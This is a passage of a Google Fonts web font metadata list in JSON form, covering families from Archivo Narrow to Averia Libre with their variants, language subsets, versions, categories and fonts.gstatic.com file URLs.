\"http://fonts.gstatic.com/s/archivonarrow/v28/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BK84HmpNiEr6T6Y.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BKF4HmpNiEr6T6Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Are You Serious\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/areyouserious/v10/ll8kK2GVSSr-PtjQ5nONVcNn4306hT9nCGRayg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aref Ruqaa\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arefruqaa/v25/WwkbxPW1E165rajQKDulEIAiVNo5xNY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arefruqaa/v25/WwkYxPW1E165rajQKDulKDwNcNIS2N_7Bdk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aref Ruqaa Ink\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-14\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arefruqaaink/v5/1q2fY5WOGUFlt84GTOkP6Kdx72ThVIGpgnxL.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arefruqaaink/v5/1q2cY5WOGUFlt84GTOkP6Kdx71xde6WhqWBCyxWn.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arima\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\",\n        \"tamil\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1YTE-pQGOyYw2fw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX14TA-pQGOyYw2fw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1PzA-pQGOyYw2fw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1YTA-pQGOyYw2fw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1UzA-pQGOyYw2fw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1vzc-pQGOyYw2fw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arima/v1/neIWzCqmt4Aup_qE1nFWqxI1RZX1hjc-pQGOyYw2fw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arima Madurai\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t4IRoeKYORG0WNMgnC3seB1V3PqrGCch4Drg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1fHuipusfhcat2c.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1ZXtipusfhcat2c.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5tmIRoeKYORG0WNMgnC3seB7TnFrpOHYh4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1c3sipusfhcat2c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1YXqipusfhcat2c.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1Znpipusfhcat2c.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/arimamadurai/v14/t5t7IRoeKYORG0WNMgnC3seB1b3oipusfhcat2c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arimo\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk37cxsBxDAVQI4aA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk338xsBxDAVQI4aA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk3M8tsBxDAVQI4aA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arimo/v27/P5sfzZCDf9_T_3cV7NCUECyoxNk3CstsBxDAVQI4aA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY-ERBrEdwcoaKww.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY-2RBrEdwcoaKww.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY9aQxrEdwcoaKww.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/arimo/v27/P5sdzZCDf9_T_10c3i9MeUcyat4iJY9jQxrEdwcoaKww.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arizonia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arizonia/v19/neIIzCemt4A5qa7mv6WGHK06UY30.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Armata\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/armata/v19/gokvH63_HV5jQ-E9lD53Q2u_mQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arsenal\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arsenal/v12/wXKrE3kQtZQ4pF3D11_WAewrhXY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/arsenal/v12/wXKpE3kQtZQ4pF3D513cBc4ulXYrtA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arsenal/v12/wXKuE3kQtZQ4pF3D7-P5JeQAmX8yrdk.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/arsenal/v12/wXKsE3kQtZQ4pF3D513kueEKnV03vdnKjw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Artifika\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2023-01-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/artifika/v21/VEMyRoxzronptCuxu6Wt5jDtreOL.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arvo\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arvo/v20/tDbD2oWUg0MKmSAa7Lzr7vs.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/arvo/v20/tDbN2oWUg0MKqSIQ6J7u_vvijQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arvo/v20/tDbM2oWUg0MKoZw1yLTA8vL7lAE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/arvo/v20/tDbO2oWUg0MKqSIoVLHK9tD-hAHkGg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arya\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arya/v19/ga6CawNG-HJd9Ub1-beqdFE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/arya/v19/ga6NawNG-HJdzfra3b-BaFg3dRE.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Asap\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYkqQsLmOXoA7Glw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYEqUsLmOXoA7Glw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYzKUsLmOXoA7Glw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYkqUsLmOXoA7Glw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYoKUsLmOXoA7Glw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYTKIsLmOXoA7Glw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYdaIsLmOXoA7Glw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYEqIsLmOXoA7Glw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/asap/v26/KFOOCniXp96a4Tc2DaTeuDAoKsE617JFc49knOIYdjTYO6IsLmOXoA7Glw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWubEbGmTggvWl0Qn.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuZEbWmTggvWl0Qn.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuaabWmTggvWl0Qn.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWubEbWmTggvWl0Qn.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWub2bWmTggvWl0Qn.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuYaammTggvWl0Qn.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuYjammTggvWl0Qn.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuZEammTggvWl0Qn.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/asap/v26/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuZtammTggvWl0Qn.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Asap Condensed\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO9DSWlEgGqgp-pO.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUIFFim6CovpOkXA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO8nSmlEgGqgp-pO.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUOVGim6CovpOkXA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxidypY1o9NHyXh3WvSbGSggdNeLYk1Mq3ap.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxifypY1o9NHyXh3WvSbGSggdOeJaElurmapvvM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO9_S2lEgGqgp-pO.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUL1Him6CovpOkXA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO9TTGlEgGqgp-pO.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUJFAim6CovpOkXA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO83TWlEgGqgp-pO.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUPVBim6CovpOkXA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO8rTmlEgGqgp-pO.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUOlCim6CovpOkXA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxieypY1o9NHyXh3WvSbGSggdO8PT2lEgGqgp-pO.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/asapcondensed/v16/pxiYypY1o9NHyXh3WvSbGSggdOeJUM1Dim6CovpOkXA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Asar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/asar/v22/sZlLdRyI6TBIXkYQDLlTW6E.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Asset\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/asset/v24/SLXGc1na-mM4cWImRJqExst1.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Assistant\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZnEGGf3qGuvM4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtrhnEGGf3qGuvM4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtuZnEGGf3qGuvM4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQttRnEGGf3qGuvM4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtjhgEGGf3qGuvM4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtgFgEGGf3qGuvM4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/assistant/v18/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZgEGGf3qGuvM4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Astloch\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/astloch/v26/TuGRUVJ8QI5GSeUjq9wRzMtkH1Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/astloch/v26/TuGUUVJ8QI5GSeUjk2A-6MNPA10xLMQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Asul\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/asul/v19/VuJ-dNjKxYr46fMFXK78JIg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/asul/v19/VuJxdNjKxYr40U8qeKbXOIFneRo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Athiti\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAxDNyAv2-C99ycg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAoDByAv2-C99ycg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/athiti/v12/pe0vMISdLIZIv1w4DBhWCtaiAg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wA-DFyAv2-C99ycg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wA1DZyAv2-C99ycg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/athiti/v12/pe0sMISdLIZIv1wAsDdyAv2-C99ycg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Atkinson Hyperlegible\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt23C1KxNDXMspQ1lPyU89-1h6ONRlW45GE5ZgpewSSbQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt43C1KxNDXMspQ1lPyU89-1h6ONRlW45G055ItWQGCbUWn.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt73C1KxNDXMspQ1lPyU89-1h6ONRlW45G8WbcNcy-OZFy-FA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/atkinsonhyperlegible/v10/9Bt93C1KxNDXMspQ1lPyU89-1h6ONRlW45G056qRdiWKRlmuFH24.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Atma\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo8JzKjc9PvedRkM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/atma/v15/uK_84rqWc-Eom25bDj8WIv4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo5pyKjc9PvedRkM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo7Z1Kjc9PvedRkM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/atma/v15/uK_z4rqWc-Eoo9J0Kjc9PvedRkM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Atomic Age\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/atomicage/v27/f0Xz0eug6sdmRFkYZZGL58Ht9a8GYeA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aubrey\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aubrey/v28/q5uGsou7NPBw-p7vugNsCxVEgA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Audiowide\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/audiowide/v16/l7gdbjpo0cum0ckerWCtkQXPExpQBw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Autour One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/autourone/v24/UqyVK80cP25l3fJgbdfbk5lWVscxdKE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Average\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/average/v18/fC1hPYBHe23MxA7rIeJwVWytTyk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Average Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/averagesans/v16/1Ptpg8fLXP2dlAXR-HlJJNJPBdqazVoK4A.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Averia Gruesa Libre\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/averiagruesalibre/v22/NGSov4nEGEktOaDRKsY-1dhh8eEtIx3ZUmmJw0SLRA8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Averia Libre\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/averialibre/v16/2V0FKIcMGZEnV6xygz7eNjEarovtb07t-pQgTw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/averialibre/v16/2V0HKIcMGZEnV6xygz7eNjESAJFhbUTp2JEwT4Sk.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/averialibre/v16/2V0aKIcMGZEnV6xygz7eNjEiAqPJZ2Xx8w.ttf\",\n        \"italic\": 